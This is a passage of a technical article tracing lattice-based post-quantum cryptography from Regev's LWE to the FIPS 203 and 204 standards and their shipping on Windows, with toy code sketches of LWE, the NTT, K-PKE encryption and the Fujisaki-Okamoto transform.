SIDH and SIKE (2011-2022) were the most efficient post-quantum proposal by public-key size. Supersingular Isogeny Diffie-Hellman, introduced by Jao and De Feo in 2011 [@jao-defeo-2011], achieved public keys of roughly 330 bytes at category 1 [@wp-sidh] -- smaller than ML-KEM-512's 800 bytes. NIST advanced SIKE to the fourth round of evaluation on 5 July 2022 [@nist-pqc-selection-2022]. On 30 July 2022, twenty-five days later, Wouter Castryck and Thomas Decru published "An efficient key recovery attack on SIDH," recovering SIKEp434's secret key in about ten minutes on a single CPU core via a torsion-point exploitation of Kani's reducibility criterion [@castryck-decru-sidh]. The higher-security parameter set SIKEp751 (NIST category 5) fell in roughly three hours on the same hardware. A concurrent paper by Maino and Martindale extended the attack to arbitrary starting curves [@maino-martindale-sidh]. One paper, one month, the entire isogeny lane retired. SIKE is the canonical example of why NIST's portfolio rests on multiple unrelated hardness assumptions.

[Figure: post-quantum cryptography family tree. Lattice (LWE, Module-LWE, NTRU): active, with ML-KEM, ML-DSA, and Falcon. Code-based (Goppa, Quasi-Cyclic): niche, with HQC and Classic McEliece. Multivariate (HFE, Rainbow): dead, Rainbow broken 2022. Hash-based (XMSS, LMS, SPHINCS+): active, with SLH-DSA, LMS, and XMSS. Isogeny (SIDH, SIKE): dead, SIDH/SIKE broken 2022.]

Worst-case-to-average-case reduction: A proof technique, introduced for lattices by Miklos Ajtai in 1996 and refined for LWE by Oded Regev in 2005, that ties the average-case security of a cryptosystem to the worst-case hardness of an underlying lattice problem [@regev-2005]. The reduction says: solving random instances of the cryptosystem at any non-negligible advantage gives an algorithm for the *worst-case* hard problem. RSA has no analogous reduction; the average factoring instance is conjectured hard, but no theorem ties it to worst-case factoring. The lattice reduction is the structural argument for why post-quantum lattice cryptography may be more conservative, in a formal sense, than RSA.

The portfolio lesson lands here, and it is the article's first aha moment. Post-quantum cryptography is not a single family; it is a portfolio across multiple hardness assumptions, because any one of them can fall, and two of them did during the modern standardisation effort. The Rainbow break and the SIKE break both happened during the NIST competition, in 2022, on candidates that NIST had advanced for further study. This is why the eventual slate -- ML-KEM (lattice) plus SLH-DSA (hash) -- sits on two structurally unrelated foundations. A single mathematical break cannot retire the whole programme.

Lattices survived. But the lattices of 2005 had megabyte-scale public keys, unusable in TLS. How those keys were compressed to kilobytes is the story of the next section.

4. The Evolution -- Lattices in Five Generations

In 2005, Oded Regev published a paper that gave lattice cryptography the mathematical foundation RSA never had. By 2010, the same idea had been compressed by a factor of n by moving to polynomial rings, with the Number Theoretic Transform keeping the arithmetic fast; by 2015 it had been generalised with a parameter knob that let one base ring serve every security category; by 2024 it was a Federal Information Processing Standard. This section walks the generation-by-generation story of how lattices got from impossible to inevitable.

Generation 0 (1976-1994): the classical baseline

Diffie-Hellman, RSA, DSA, ECDH, ECDSA. Five primitives over four decades, all resting on integer factoring or on discrete-log hardness in one group or another, all retired in one stroke by Shor's algorithm. The classical baseline is what PQC replaces. Nothing about post-quantum cryptography innovates on the symmetric side; AES and SHA-2 survive with parameter increases.

Generation 1 (1996-2009): plural hard problems, mostly impractical

Miklos Ajtai's 1996 STOC paper "Generating Hard Instances of Lattice Problems" introduced the first worst-case-to-average-case reduction for a lattice problem (the Short Integer Solution problem) [@ajtai-1996]. The reduction was a foundational theoretical result; the cryptographic constructions built from it had public keys in the megabytes.

Nine years later, Oded Regev published "On Lattices, Learning with Errors, Random Linear Codes, and Cryptography" at STOC 2005 [@regev-2005]. The Learning With Errors problem is simple to state.

Learning With Errors (LWE): Given a uniformly random matrix $A \in \mathbb{Z}_q^{m \times n}$, a secret vector $s \in \mathbb{Z}_q^n$, and a small noise vector $e$ sampled from a Gaussian-like distribution, distinguish the pair $(A, As + e)$ from a uniformly random pair $(A, b)$ where $b$ is uniform in $\mathbb{Z}_q^m$. LWE is conjectured hard for any polynomial-time algorithm, classical or quantum; Regev's theorem ties LWE to the worst-case hardness of approximating shortest-vector problems on $n$-dimensional lattices, via a quantum reduction [@regev-2005].

LWE was the cryptographic breakthrough. The construction was clean, the reduction tied average-case security to worst-case lattice hardness, and the resulting cryptosystem was simple enough that any cryptographer could implement it. But the public key was a full $n \times n$ matrix over $\mathbb{Z}_q$ -- $O(n^2 \log q)$ bits. At the parameter sizes needed for 128-bit security, that meant several megabytes of public key. Unusable in TLS, unusable in X.509, unusable in any deployment that touches the wire.
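A toy LWE instance makes both the definition and the size problem concrete. The sketch below assumes deliberately tiny parameters and uses bounded uniform noise as a stand-in for the Gaussian-like distribution; neither choice is secure, and the function names are illustrative. The matrix-size figure at the end uses example dimensions chosen for this sketch, not the parameters of Regev's paper or of any standard.

```python
import random


def lwe_samples(n, m, q, noise_bound, rng):
    """Return (A, b, s, e) with b = A*s + e mod q."""
    s = [rng.randrange(q) for _ in range(n)]
    A = [[rng.randrange(q) for _ in range(n)] for _ in range(m)]
    e = [rng.randint(-noise_bound, noise_bound) for _ in range(m)]
    b = [(sum(a * x for a, x in zip(row, s)) + err) % q
         for row, err in zip(A, e)]
    return A, b, s, e


def centered(x, q):
    """Map x mod q into the range (-q/2, q/2]."""
    x %= q
    return x - q if x > q // 2 else x


def matrix_bits(n, m, q):
    """Bits needed to store an m x n matrix of values mod q."""
    return n * m * (q - 1).bit_length()


rng = random.Random(2005)
A, b, s, e = lwe_samples(n=8, m=16, q=3329, noise_bound=2, rng=rng)

# Knowing s, subtracting A*s from b leaves only the small noise vector.
residuals = [centered(bi - sum(a * x for a, x in zip(row, s)), 3329)
             for row, bi in zip(A, b)]
print(residuals == e)

# Storage for an unstructured matrix grows with the square of the dimension.
print(matrix_bits(512, 512, 3329) // 8, "bytes for a 512 x 512 matrix mod 3329")
```

Without `s`, the vector `b` is meant to look uniform. The quadratic growth in `matrix_bits` is the cost the ring and module variants remove.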

Generation 2 (2010-2017): the ring-LWE and module-LWE compression

The compression that made lattices deployable was a single algebraic move. Lift LWE from $\mathbb{Z}_q$ to a polynomial ring. Lyubashevsky, Peikert, and Regev's 2010 paper "On Ideal Lattices and Learning with Errors over Rings" (eprint 2012/230) introduced Ring-LWE [@lpr-2010-ringlwe]. The underlying ring is $R_q = \mathbb{Z}_q[X]/(X^n + 1)$ for $n$ a power of two; the secret and noise are now polynomials in $R_q$ rather than vectors over $\mathbb{Z}_q$. Multiplying two ring elements becomes a polynomial multiplication, which the Number Theoretic Transform reduces from $O(n^2)$ scalar multiplications to $O(n \log n)$.

Number Theoretic Transform (NTT): A discrete Fourier transform over a finite field rather than the complex numbers. For a prime $q$ such that $2n$ divides $q - 1$, NTT converts a polynomial $a(X) \in \mathbb{Z}_q[X]/(X^n + 1)$ into its evaluations at the $n$ primitive $2n$-th roots of unity in $\mathbb{Z}_q$, which are exactly the roots of $X^n + 1$. Polynomial multiplication then becomes pointwise multiplication of the NTT vectors. NTT is the speedup that takes Ring-LWE multiplication from $O(n^2)$ to $O(n \log n)$ and is the reason ML-KEM-768 encapsulates in tens of microseconds on commodity x86-64 [@fips-203-pdf].
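The claim that multiplication becomes pointwise in the transform domain can be checked on a toy ring. The sketch below assumes $n = 4$ and $q = 17$, with 2 as a primitive 8th root of unity, and evaluates the transform directly in $O(n^2)$ steps. It demonstrates the algebra only; the $O(n \log n)$ butterfly network that production code uses is not implemented here, and these are not ML-KEM's parameters.

```python
Q = 17   # toy prime with 2*N dividing Q - 1
N = 4    # ring degree: Z_Q[X] / (X^N + 1)
PSI = 2  # primitive 2N-th root of unity mod Q, since 2**4 % 17 == 16 == -1


def ntt(a):
    """Evaluate a(X) at the odd powers of PSI, the roots of X^N + 1."""
    return [sum(c * pow(PSI, (2 * j + 1) * i, Q) for i, c in enumerate(a)) % Q
            for j in range(N)]


def intt(a_hat):
    """Interpolate the coefficients back from the N evaluations."""
    n_inv = pow(N, -1, Q)
    psi_inv = pow(PSI, -1, Q)
    return [n_inv * sum(v * pow(psi_inv, (2 * j + 1) * i, Q)
                        for j, v in enumerate(a_hat)) % Q
            for i in range(N)]


def multiply_schoolbook(a, b):
    """Reference product in Z_Q[X]/(X^N + 1), using X^N = -1."""
    out = [0] * N
    for i, x in enumerate(a):
        for j, y in enumerate(b):
            k = i + j
            if k < N:
                out[k] = (out[k] + x * y) % Q
            else:
                out[k - N] = (out[k - N] - x * y) % Q
    return out


def multiply_ntt(a, b):
    """Transform, multiply pointwise, transform back."""
    return intt([x * y % Q for x, y in zip(ntt(a), ntt(b))])


a, b = [1, 2, 3, 4], [5, 6, 7, 8]
print(multiply_ntt(a, b) == multiply_schoolbook(a, b))
```

The modular inverse via `pow(x, -1, Q)` needs Python 3.8 or later. Evaluating at the roots of $X^N + 1$ is what makes the wrap-around sign come out right without any explicit reduction step.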

Public keys dropped from megabytes to kilobytes. The 2010 lift is the load-bearing intellectual move; everything subsequent is engineering.

Adeline Langlois and Damien Stehle's 2012/2015 Module-LWE paper added a parameter knob [@langlois-stehle-modulelwe]. Module-LWE works over $R_q$ rings of fixed degree $n$ (typically 256 in ML-KEM), but lifts the secret and matrix into module rank $k$: $A$ is a $k \times k$ matrix of ring elements, $s$ is a $k$-vector of ring elements. Now one base ring of degree 256 can serve every NIST security category by varying $k \in \{2, 3, 4\}$. ML-KEM-512 uses $k = 2$; ML-KEM-768 uses $k = 3$; ML-KEM-1024 uses $k = 4$. The compiler-style metaphor is exact: Ring-LWE was an over-fitted special case, Module-LWE generalises it.

Module-LWE: A generalisation of Learning With Errors over polynomial rings of fixed degree, in which the secret is a $k$-vector of ring elements and the matrix is $k \times k$. Module-LWE inherits the worst-case-to-average-case reduction from Ring-LWE [@langlois-stehle-modulelwe], offers a finer-grained security knob than either LWE or Ring-LWE, and is the underlying hardness assumption of ML-KEM (FIPS 203) and ML-DSA (FIPS 204) [@fips-203-pdf, @fips-204-pdf].

The first TLS deployment of a Ring-LWE key exchange landed in 2014, and Microsoft Research was at the centre of it.

The BCNS 2014 paper "Post-quantum key exchange for the TLS protocol from the ring learning with errors problem" by Joppe Bos, Craig Costello, Michael Naehrig, and Douglas Stebila (eprint 2014/599) was the first end-to-end TLS implementation of a Ring-LWE key exchange [@bcns-2014]. Two of the four authors -- Costello and Naehrig -- were at Microsoft Research Redmond. Two years later, the same Microsoft Research group plus collaborators published Frodo (CCS 2016, eprint 2016/659), the unstructured-LWE conservative fallback design with no ring algebra [@frodo-2016]. Frodo became FrodoKEM in the NIST process; FrodoKEM was selected as a Round-3 alternate but not advanced to standardisation [@frodokem-project]. Microsoft Research's own retrospective spans this work: "Our PQC effort began in 2014 when we published research on post-quantum algorithms and later quantum cryptanalysis ... we participated in four submissions to the original 2017 NIST PQC call and one submission to the current call. Since 2018 we have been experimenting with verified versions of PQC algorithms and in 2019 Microsoft Research completed testing of an experimental PQC-protected VPN tunnel between Redmond, Washington, and Scotland" [@ms-quantum-safe-blog]. The 2024 FIPS publication did not surprise Microsoft.

Google's Chrome team deployed the construction in production first. CECPQ1 ("Combined Elliptic-Curve and Post-Quantum 1") shipped in Chrome Canary in July 2016, combining X25519 with NewHope [@google-cecpq1]. NewHope was a Ring-LWE construction by Alkim, Ducas, Poppelmann, and Schwabe; CECPQ1 ran for several months as an experiment, measured the cost of an extra ~2 KB on each handshake, and was retired. CECPQ2 replaced it with NTRU-HRSS -- the announcement post by Adam Langley names the lineage explicitly ("CECPQ1 was the experiment ... It's about time for CECPQ2") and the NTRU-HRSS basis -- and was wound down in 2022 as Chrome migrated to the X25519+Kyber-768 hybrid following NIST's July 2022 selection [@cloudflare-pq-2024]. The parallel CECPQ2b experiment paired X25519 with SIKE; the Castryck-Decru break that same month retired CECPQ2b along with the entire isogeny lane. The Cloudflare-Microsoft-Google triad has been iterating in production since.

Generation 3 (2017-2022): the NIST competition

NIST issued the formal call for post-quantum public-key submissions in December 2016. Eighty-two submissions arrived by the November 2017 deadline; sixty-nine were judged complete and proper, advancing into Round 1 (announced December 2017) [@wp-nist-pqc]. The field narrowed to 26 algorithms in Round 2 (January 2019), then to 7 finalists plus 8 alternates in Round 3 (July 2020). NIST IR 8413 (July 2022) is the canonical status report on Round 3 [@nist-ir-8413].

The 82-vs-69 discrepancy is a frequent source of confusion in PQC pedagogy. Eighty-two total submissions, sixty-nine deemed "complete and proper" by NIST's intake review, advanced to Round 1. The remaining thirteen had documentation defects or were withdrawn. Wikipedia's "NIST Post-Quantum Cryptography Standardization" article spells out both numbers verbatim [@wp-nist-pqc].

On 5 July 2022, NIST announced the first four standardisation selections: CRYSTALS-Kyber for key encapsulation, plus CRYSTALS-Dilithium, FALCON, and SPHINCS+ for signatures [@nist-pqc-selection-2022]. Three were lattice schemes; one (SPHINCS+) was hash-based. The same announcement moved Classic McEliece, BIKE, HQC, and SIKE to a fourth round for further evaluation. Twenty-five days later, the Castryck-Decru attack retired SIKE. NIST IR 8545 documents the eventual fourth-round selection of HQC (announced 7 March 2025) over BIKE, with Classic McEliece left as a candidate for niche-use standardisation due to its key size [@nist-hqc-news].

[Figure: timeline of milestones. Algorithm research: Diffie-Hellman (1976), Shor's algorithm (1994), NTRU (1996), Regev LWE (2005), Ring-LWE (LPR) (2010), Module-LWE (2012), BCNS / Frodo / NewHope (2014). NIST process: PQC call announced (2016), Round 1 with 69 candidates (2017), Round 2 with 26 candidates (2019), Round 3 finalists (2020), selections plus Round 4 (2022), Rainbow and SIKE broken (2022), FIPS 203 / 204 / 205 (2024), HQC selected (2025). Windows shipping: SymCrypt v103.5.0 ML-KEM (2024), Insider Canary CNG PQ (2025), .NET 10 GA (2025), Schannel X25519MLKEM768 (2026), TPM 2.0 v1.85 PQC (2026).]

Generation 4 (2023-2024): standardisation

The draft FIPS standards were published in August 2023; the final versions landed on 13 August 2024, when the Secretary of Commerce approved FIPS 203, FIPS 204, and FIPS 205 [@nist-fips-approved-news]. Names changed in the transition: CRYSTALS-Kyber [@crystals-kyber-paper] became Module-Lattice-Based Key-Encapsulation Mechanism (ML-KEM); CRYSTALS-Dilithium became Module-Lattice-Based Digital Signature Algorithm (ML-DSA); SPHINCS+ [@sphincsplus-framework] became Stateless Hash-Based Digital Signature Algorithm (SLH-DSA). The renaming was deliberate; NIST wanted standard names that described the construction rather than the project. Falcon's standardisation slipped to FIPS 206 in draft, principally because the floating-point Gaussian sampler required for Falcon's compact signatures is unusually hard to make both fast and constant-time [@nist-pqc-dig-sig].

Generation 5 (2024-2026): shipping on Windows

SymCrypt v103.5.0 added ML-KEM "per final FIPS 203" along with XMSS and XMSS^MT [@symcrypt-changelog]. Subsequent versions added LMS (v103.6.0), ML-DSA (v103.7.0), FIPS-approved-services indicator (v103.8.0), ML-DSA External-Mu sign/verify (v103.9.0), FIPS CAST plus ML-KEM/ML-DSA keygen pairwise consistency tests (v103.9.1), and Composite ML-KEM (v103.11.0). The Windows Insider Canary channel exposed the CNG identifiers in May 2025 [@ms-pqc-windows-insider]. .NET 10 (GA November 2025) shipped managed types System.Security.Cryptography.MLKem, MLKemCng, MLDsa, MLDsaCng [@dotnet-10-launch, @dotnet-mlkem, @dotnet-mlkemcng]. Schannel hybrid TLS 1.3 X25519MLKEM768 reached Server 2025 and 24H2 in preview behind Group Policy in early 2026.

The competition is over. The standards are published. The SymCrypt versions are shipping. We have arrived at the moment where the algorithm internals matter -- because every Windows engineer now writes code against BCRYPT_MLKEM_ALG_HANDLE, and code that uses an algorithm should know how it works.

5. The Breakthrough -- ML-KEM, ML-DSA, SLH-DSA at Engineer Depth

Three FIPS standards. Three algorithms. Three Windows API surfaces. Each rests on a different hardness assumption. Each has its own parameter zoo, key sizes, and side-channel surface. This section walks all three at the level a Windows engineer needs to make procurement, audit, and migration decisions.

5.1 ML-KEM (FIPS 203) -- the default KEM

ML-KEM is the only NIST-finalised key-encapsulation mechanism. It is the encryption primitive of the post-quantum era on Windows. The algebra is Module-LWE over $R_q = \mathbb{Z}_q[X]/(X^{256} + 1)$ with $q = 3329$ -- a 12-bit prime chosen to make NTT arithmetic fast on 16-bit and 32-bit lanes [@fips-203-pdf]. The base ring has degree 256; the module rank $k$ selects the parameter set.

Parameter set	$k$	NIST category	Encapsulation key (bytes)	Ciphertext (bytes)	Shared secret (bytes)
ML-KEM-512	2	1 (AES-128 equivalent)	800	768	32
ML-KEM-768	3	3 (AES-192 equivalent)	1184	1088	32
ML-KEM-1024	4	5 (AES-256 equivalent)	1568	1568	32

The byte counts in the table are verbatim from the FIPS 203 standard [@fips-203-pdf, @wp-kyber]. Cloudflare's October 2022 deployment and Schannel's X25519MLKEM768 both target ML-KEM-768 specifically -- the category-3 sweet spot that survives even an aggressive cryptanalytic improvement against Module-LWE [@cloudflare-pq-for-all, @draft-tls-ecdhe-mlkem]. Apple's PQ3 splits its parameter selection: ML-KEM-1024 for the initial key exchange and Kyber-768 for the ongoing asymmetric ratchet [@apple-imessage-pq3]. OpenSSH 9.0+ deployed a different post-quantum primitive entirely -- Streamlined NTRU Prime in sntrup761x25519-sha512 [@openssh-9-0] -- and OpenSSH 9.9 (released 19 September 2024) added the ML-KEM-768-based group mlkem768x25519-sha256 available by default alongside it [@openssh-9-9].
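The byte counts are not arbitrary; they fall out of the module rank and the compression widths. A minimal sketch, assuming the per-set compression parameters `du` and `dv` as I read them from the FIPS 203 parameter table (the names `MlKemParams`, `encapsKeyBytes`, and `ciphertextBytes` are mine, not from any library):

```typescript
// Sketch: derive the ML-KEM byte counts from the FIPS 203 parameters.
// Assumption: (k, du, dv) per parameter set as tabulated in FIPS 203.
interface MlKemParams { label: string; k: number; du: number; dv: number; }

const ML_KEM_SETS: MlKemParams[] = [
  { label: "ML-KEM-512", k: 2, du: 10, dv: 4 },
  { label: "ML-KEM-768", k: 3, du: 10, dv: 4 },
  { label: "ML-KEM-1024", k: 4, du: 11, dv: 5 },
];

const N_COEFFS = 256;      // coefficients per polynomial
const BITS_PER_COEFF = 12; // q = 3329 fits in 12 bits

// Encapsulation key: k polynomials at 12 bits per coefficient, plus a 32-byte seed for A.
function encapsKeyBytes(p: MlKemParams): number {
  return (p.k * N_COEFFS * BITS_PER_COEFF) / 8 + 32;
}

// Ciphertext: u is k polynomials compressed to du bits each, v is one polynomial at dv bits.
function ciphertextBytes(p: MlKemParams): number {
  return (N_COEFFS * (p.du * p.k + p.dv)) / 8;
}

const mlKemSizes = ML_KEM_SETS.map((p) => ({
  label: p.label,
  ek: encapsKeyBytes(p),
  ct: ciphertextBytes(p),
}));
```

The shared secret stays at 32 bytes regardless of `k`, which is why only the key and ciphertext columns grow with the security category.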

Fujisaki-Okamoto (FO) transform: A generic construction that converts an IND-CPA-secure public-key encryption scheme into an IND-CCA2-secure key-encapsulation mechanism. The transform re-encrypts the plaintext during decapsulation and verifies the resulting ciphertext bit-for-bit; any mismatch causes decapsulation to return an implicit-rejection pseudorandom value rather than the real shared secret. ML-KEM wraps an IND-CPA-secure scheme called K-PKE with the FO transform; the FO wrapper is what makes ML-KEM safe to use with long-term keys [@fips-203-pdf].

ML-KEM has three operations: KeyGen produces $(ek, dk)$; Encaps(ek) produces $(K, c)$ where $K$ is the 32-byte shared secret and $c$ is the ciphertext; Decaps(dk, c) recomputes $K$. The CNG surface mirrors this exactly. The canonical Microsoft idiom (from Microsoft Learn's CNG ML-KEM examples, currently marked prerelease) is BCryptGenerateKeyPair with the pseudo-handle BCRYPT_MLKEM_ALG_HANDLE, followed by BCryptSetProperty setting BCRYPT_PARAMETER_SET_NAME to BCRYPT_MLKEM_PARAMETER_SET_768, followed by BCryptFinalizeKeyPair, followed by BCryptExportKey to extract the encapsulation key as a BCRYPT_MLKEM_ENCAPSULATION_BLOB [@cng-mlkem-examples]. The new verbs BCryptEncapsulate and BCryptDecapsulate complete the picture; neither existed in CNG before the ML-KEM surface was added.

sequenceDiagram
  participant C as Client (Windows / Schannel)
  participant S as Server (Cloudflare / IIS)
  C->>S: ClientHello key_share = ML-KEM-768 ek (1184B) || X25519 (32B)
  Note over S: Generates X25519 keypair
  Note over S: Computes ML-KEM Encaps(ek)
  Note over S: Yields ct and K_pq
  S->>C: ServerHello key_share = ML-KEM-768 ct (1088B) || X25519 (32B)
  Note over C: Derives ECDH shared secret K_ecdh
  Note over C: Computes ML-KEM Decaps for K_pq
  Note over C,S: HKDF-Extract IKM = K_pq concat K_ecdh
  Note over C,S: Yields TLS 1.3 traffic secrets

The internal construction of ML-KEM combines an IND-CPA-secure public-key encryption scheme called K-PKE with the Fujisaki-Okamoto-Hofheinz transform to produce an IND-CCA2 KEM. K-PKE is a Regev-style encryption scheme with module structure, and its encryption routine is simple enough to sketch in a few lines.

{// Illustrative ML-KEM K-PKE encryption.
// The FIPS 203 standard is the normative source for byte-exact operations.
// q = 3329, n = 256, ring R_q = Z_q[X] / (X^n + 1), module rank k in {2, 3, 4}.
// Helper functions are illustrative, not a real library. Each sampler takes a
// domain-separation nonce so that r, e1, and e2 are independent draws from one seed.
// Ciphertext compression is omitted.
function kpkeEncrypt(ek: PublicKey, message: number[], seed: Uint8Array) {
  const { A, t, k } = ek;                        // A is k x k matrix in R_q, t is k-vector in R_q
  const r = sampleSmallCBD(seed, k, 0);          // r: k-vector, centred binomial noise (nonces 0..k-1)
  const e1 = sampleSmallCBD(seed, k, k);         // e1: k-vector, fresh noise (nonces k..2k-1)
  const e2 = sampleSmallSingle(seed, 2 * k);     // e2: single polynomial, fresh noise (nonce 2k)
  const u = ringMatVecMul(transpose(A), r);
  addInPlace(u, e1);                             // u = A^T r + e1
  const v = ringDot(t, r);                       // v = t . r
  addInPlace(v, e2);                             // v = t.r + e2
  const mEncoded = encodeMessage(message);       // 256-bit message -> R_q element
  addInPlace(v, mEncoded);                       // v += Encode(message)
  return { u, v };                               // ciphertext (u in R_q^k, v in R_q)
}}
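To see why decryption recovers the message, it helps to run the same algebra at toy scale. The following is a sketch under loud assumptions: ring degree 8 instead of 256, rank 2, a linear congruential generator standing in for the standard's SHAKE-based sampling, schoolbook multiplication instead of the NTT, and no compression. Every name here is hypothetical. The noise term $e^T r + e_2 - s^T e_1$ is bounded by 130 in absolute value at these sizes, comfortably below $q/4$, so decoding always succeeds.

```typescript
// Toy K-PKE round trip. Assumptions: n = 8 and k = 2 (far too small to be secure),
// a non-cryptographic LCG instead of SHAKE, no NTT, no ciphertext compression.
const TOY_Q = 3329;
const TOY_N = 8;
const TOY_K = 2;
type Poly = number[]; // TOY_N coefficients in [0, TOY_Q)

const modQ = (x: number): number => ((x % TOY_Q) + TOY_Q) % TOY_Q;
const zeroPoly = (): Poly => new Array<number>(TOY_N).fill(0);
const polyAdd = (a: Poly, b: Poly): Poly => a.map((c, i) => modQ(c + b[i]));
const polySub = (a: Poly, b: Poly): Poly => a.map((c, i) => modQ(c - b[i]));

// Schoolbook product in Z_q[X]/(X^n + 1): X^n wraps around to -1.
function polyMul(a: Poly, b: Poly): Poly {
  const out = zeroPoly();
  for (let i = 0; i < TOY_N; i++) {
    for (let j = 0; j < TOY_N; j++) {
      const sign = i + j >= TOY_N ? -1 : 1;
      const idx = (i + j) % TOY_N;
      out[idx] = modQ(out[idx] + sign * a[i] * b[j]);
    }
  }
  return out;
}

const dotVec = (a: Poly[], b: Poly[]): Poly =>
  a.reduce((acc, p, i) => polyAdd(acc, polyMul(p, b[i])), zeroPoly());

// Deterministic stand-in for the standard's XOF/PRF.
function makeToyRng(seed: number): () => number {
  let state = seed >>> 0;
  return () => (state = (Math.imul(state, 1664525) + 1013904223) >>> 0);
}

const uniformPoly = (rng: () => number): Poly =>
  Array.from({ length: TOY_N }, () => (rng() >>> 8) % TOY_Q);

// Centred binomial with eta = 2: coefficients in {-2, ..., 2}, stored mod q.
const smallPoly = (rng: () => number): Poly =>
  Array.from({ length: TOY_N }, () => {
    const bits = rng() >>> 28; // four pseudo-random bits
    return modQ((bits & 1) + ((bits >> 1) & 1) - ((bits >> 2) & 1) - ((bits >> 3) & 1));
  });
const smallVec = (rng: () => number): Poly[] =>
  Array.from({ length: TOY_K }, () => smallPoly(rng));

interface ToyKeyPair { A: Poly[][]; t: Poly[]; s: Poly[]; }

function toyKeyGen(seed: number): ToyKeyPair {
  const rng = makeToyRng(seed);
  const A = Array.from({ length: TOY_K }, () =>
    Array.from({ length: TOY_K }, () => uniformPoly(rng)));
  const s = smallVec(rng);
  const e = smallVec(rng);
  const t = A.map((row, i) => polyAdd(dotVec(row, s), e[i])); // t = A s + e
  return { A, t, s };
}

function toyEncrypt(A: Poly[][], t: Poly[], bits: number[], seed: number) {
  const rng = makeToyRng(seed);
  const r = smallVec(rng);
  const e1 = smallVec(rng);
  const e2 = smallPoly(rng);
  // u = A^T r + e1: entry i uses column i of A.
  const u = e1.map((noise, i) => polyAdd(dotVec(A.map((row) => row[i]), r), noise));
  const encoded = bits.map((b) => b * 1665); // bit -> 0 or round(q / 2)
  const v = polyAdd(polyAdd(dotVec(t, r), e2), encoded); // v = t . r + e2 + Encode(m)
  return { u, v };
}

function toyDecrypt(s: Poly[], ct: { u: Poly[]; v: Poly }): number[] {
  const w = polySub(ct.v, dotVec(s, ct.u)); // w = Encode(m) + small noise
  return w.map((c) => (c > TOY_Q / 4 && c < (3 * TOY_Q) / 4 ? 1 : 0));
}
```

Calling `toyDecrypt(kp.s, toyEncrypt(kp.A, kp.t, bits, seed))` with `kp = toyKeyGen(...)` and an 8-bit `bits` array returns the original bits. The real scheme adds compression and an NTT, and chooses parameters so that the same noise-versus-$q/4$ argument holds with overwhelming probability rather than with certainty.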

The IND-CCA2 wrapper that becomes ML-KEM proper is the FO transform: hash the message and randomness into the encapsulation, then re-encrypt during decapsulation and reject if the ciphertext does not match. Decapsulation on a tampered ciphertext returns a pseudorandom shared secret derived from the secret key -- implicit rejection -- rather than an error code that an attacker could observe. This is what gives ML-KEM CCA2 security suitable for static keys in TLS, X.509, and CNG.
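The control flow of the FO wrapper is easier to follow in code than in prose. The sketch below is a toy, not ML-KEM: it assumes hashed ElGamal over a 17-bit prime as the stand-in deterministic-given-coins PKE and FNV-1a as the stand-in hash, and all function names are hypothetical. What it does preserve is the shape: derive the coins from the message, re-encrypt on decapsulation, and return a pseudorandom key instead of an error on mismatch.

```typescript
// Toy FO-style KEM with implicit rejection. Assumptions: hashed ElGamal over a
// 17-bit prime as the stand-in PKE and FNV-1a as the stand-in hash. Neither is secure.
const FO_P = 65537; // toy prime modulus
const FO_G = 3;     // generator of the multiplicative group mod FO_P

function powMod(base: number, exp: number, m: number): number {
  let result = 1;
  let b = base % m;
  for (let e = exp; e > 0; e = Math.floor(e / 2)) {
    if (e % 2 === 1) result = (result * b) % m;
    b = (b * b) % m;
  }
  return result;
}

// FNV-1a over 32-bit words, byte by byte; stands in for SHA-3 / SHAKE.
function toyHash(...words: number[]): number {
  let h = 0x811c9dc5;
  for (const w of words) {
    for (let shift = 0; shift < 32; shift += 8) {
      h = Math.imul(h ^ ((w >>> shift) & 0xff), 0x01000193) >>> 0;
    }
  }
  return h;
}

interface ToyCiphertext { c1: number; c2: number; }

// Deterministic once the coins r are fixed, which is what lets Decaps re-encrypt.
function pkeEncrypt(pk: number, m: number, r: number): ToyCiphertext {
  return { c1: powMod(FO_G, r, FO_P), c2: (m ^ toyHash(powMod(pk, r, FO_P))) >>> 0 };
}

function pkeDecrypt(sk: number, ct: ToyCiphertext): number {
  return (ct.c2 ^ toyHash(powMod(ct.c1, sk, FO_P))) >>> 0;
}

// Derive the shared secret K and the encryption coins r from (m, pk).
function deriveKeyAndCoins(m: number, pk: number): { K: number; r: number } {
  return { K: toyHash(1, m, pk), r: 1 + (toyHash(2, m, pk) % (FO_P - 2)) };
}

interface ToyDecapsKey { sk: number; pk: number; z: number; } // z = implicit-rejection seed

function foKeyGen(sk: number, z: number): ToyDecapsKey {
  return { sk, pk: powMod(FO_G, sk, FO_P), z };
}

function foEncaps(pk: number, m: number): { K: number; ct: ToyCiphertext } {
  const { K, r } = deriveKeyAndCoins(m, pk);
  return { K, ct: pkeEncrypt(pk, m, r) };
}

function foDecaps(dk: ToyDecapsKey, ct: ToyCiphertext): number {
  const m = pkeDecrypt(dk.sk, ct);
  const { K, r } = deriveKeyAndCoins(m, dk.pk);
  const again = pkeEncrypt(dk.pk, m, r); // re-encrypt with the recomputed coins
  const matches = again.c1 === ct.c1 && again.c2 === ct.c2;
  // Implicit rejection: a mismatch yields a pseudorandom key, never an error.
  // A real implementation makes this selection in constant time, not with a branch.
  return matches ? K : toyHash(3, dk.z, ct.c1, ct.c2);
}
```

An honest ciphertext decapsulates to the encapsulator's `K`. Flipping any bit of `c2` changes the recovered message, so the caller receives an unrelated value and learns nothing from the return path about whether the check failed.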

5.2 ML-DSA (FIPS 204) -- the default lattice signature

ML-DSA is the general-purpose lattice signature scheme. Same base ring of degree 256 as ML-KEM, but with a different prime: $q = 8380417$, a 23-bit prime [@fips-204-pdf]. The disparity is intentional; ML-KEM and ML-DSA do not share keys, so their NTT parameter choices are independently optimised. The construction is Fiat-Shamir-with-aborts over Module-LWE and Module-SIS.

Parameter set	NIST category	Public key (bytes)	Signature (bytes)
ML-DSA-44	2	1312	2420
ML-DSA-65	3	1952	3309
ML-DSA-87	5	2592	4627

Numbers verbatim from FIPS 204 [@fips-204-pdf]. CNSA 2.0 selects ML-DSA-87 specifically as the general-signature algorithm for U.S. National Security Systems [@cnsa20-csa].

Fiat-Shamir with aborts: A signature construction in which the prover commits to a masking value, hashes the message and commitment to derive a challenge, computes a response that depends on the secret and the challenge, and *aborts and retries* if the response would leak the secret. The "abort" probability is bounded so signing completes in a small constant expected number of restarts. The technique, due to Lyubashevsky, is the foundation of ML-DSA's security argument; the rejection-sampling loop is also the source of a measurable timing variance that constant-time implementations must handle carefully [@fips-204-pdf].

flowchart TD
  Start["Begin sign(message, sk)"] --> Sample["Sample masking vector y (small ball)"]
  Sample --> Commit["Compute w = Ay in R_q"]
  Commit --> Hash["c = H(message || HighBits(w))"]
